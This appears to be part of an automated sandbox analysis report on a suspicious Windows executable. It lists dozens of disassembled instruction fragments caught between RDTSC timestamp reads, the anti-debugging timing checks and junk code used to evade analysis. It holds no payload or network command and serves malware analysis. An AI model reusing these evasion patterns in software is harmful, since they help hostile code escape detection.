Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46910 second address: D4692E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F953D46EDA5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4692E second address: D46948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F953D01523Dh 0x0000000c jng 00007F953D015236h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46948 second address: D46952 instructions: 0x00000000 rdtsc 0x00000002 js 00007F953D46ED96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46F1A second address: D46F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jc 00007F953D01523Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46F32 second address: D46F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jc 00007F953D46ED96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D47238 second address: D4723D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D477CD second address: D477D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D477D5 second address: D477D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D477D9 second address: D477DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D477DF second address: D477E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D47D1A second address: D47D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D47D20 second address: D47D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4BE85 second address: D4BE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C145 second address: D4C14E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C14E second address: D4C154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C274 second address: D4C287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F953D015236h 0x0000000d jnc 00007F953D015236h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C287 second address: D4C299 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 jc 00007F953D46ED96h 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C299 second address: D4C2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C3D6 second address: D4C3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C517 second address: D4C541 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F953D015236h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F953D015246h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D4C6B3 second address: D4C6E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F953D46EDAEh 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F953D46EDA6h 0x00000013 jmp 00007F953D46ED9Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D4C6E5 second address: D4C6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D5142D second address: D5143C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F953D46ED96h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D5143C second address: D51442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D51442 second address: D51454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F953D46ED9Bh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D5BC61 second address: D5BC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D5BC67 second address: D5BC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D46EDA7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D5BF6A second address: D5BF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b jp 00007F953D01523Ah 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jl 00007F953D01523Ch 0x0000001b jnl 00007F953D015236h 0x00000021 jno 00007F953D01523Ch 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D5C0EC second address: D5C0FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D6343E second address: D63448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D63448 second address: D63451 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D63451 second address: D63466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jno 00007F953D015236h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D6314D second address: D63151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D65A1C second address: D65A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F953D015238h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D65A32 second address: D65A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D6A755 second address: D6A761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F953D015236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D6CB78 second address: D6CB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D6CB7E second address: D6CBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F953D015248h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F953D015245h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D72D78 second address: D72D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D72D7C second address: D72D8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F953D01523Eh 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D747D0 second address: D747E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA2h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D74956 second address: D7495A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D7495A second address: D74974 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F953D46ED9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D74974 second address: D7497E instructions: 0x00000000 rdtsc 0x00000002 js 00007F953D015236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D7497E second address: D74984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D74984 second address: D7498A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D78432 second address: D78438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D78438 second address: D7843C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D7843C second address: D78464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a jmp 00007F953D46EDA8h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D78464 second address: D78491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F953D015236h 0x0000000a jl 00007F953D015236h 0x00000010 popad 0x00000011 jmp 00007F953D015244h 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F953D015236h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D78491 second address: D78497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D77D9A second address: D77DCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 jmp 00007F953D015243h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D77DCA second address: D77DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D88FFC second address: D89006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D88E17 second address: D88E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D88E1C second address: D88E28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D88E28 second address: D88E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D8C236 second address: D8C23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D9116F second address: D91175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D9171A second address: D9171F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D91847 second address: D9184B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D9184B second address: D91851 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D91851 second address: D9185B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F953D46ED96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D919B3 second address: D919B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D91B27 second address: D91B33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F953D46ED96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D951EE second address: D95205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D015243h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D94D81 second address: D94DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F953D46ED96h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007F953D46EDA6h 0x00000012 jnl 00007F953D46ED96h 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D94ECA second address: D94ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D94ECE second address: D94EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D94EDA second address: D94EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D94EDE second address: D94EE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D94EE4 second address: D94F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F953D015244h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D94F00 second address: D94F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: D94F04 second address: D94F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F953D015236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: DD5419 second address: DD541D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: DD541D second address: DD543A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F953D015244h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: DE4EF4 second address: DE4EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F953D46ED96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: DE4EFF second address: DE4F04 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: DE4F04 second address: DE4F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: DE7987 second address: DE7991 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F953D01523Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB5658 second address: EB567B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007F953D46ED96h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F953D46EDA0h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB567B second address: EB567F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB5AA7 second address: EB5AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB5C47 second address: EB5C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D015240h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB5C5C second address: EB5C7E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F953D46EDADh 0x00000008 jmp 00007F953D46EDA7h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB5F29 second address: EB5F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F953D015238h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F953D015236h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB622C second address: EB6232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB6232 second address: EB6243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F953D015236h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB6243 second address: EB6260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB63D3 second address: EB63EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015242h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB931C second address: EB9326 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB9393 second address: EB9397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB9397 second address: EB93BE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F953D46EDA9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB93BE second address: EB93C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB93C4 second address: EB93C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB93C8 second address: EB93FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or dword ptr [ebp+122D336Eh], edx 0x0000000f and dx, 8DF4h 0x00000014 push 00000004h 0x00000016 mov edx, dword ptr [ebp+122D30A5h] 0x0000001c push 851704EFh 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F953D015243h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB9636 second address: EB963A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exe RDTSC instruction interceptor: First address: EB963A second address: EB964C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
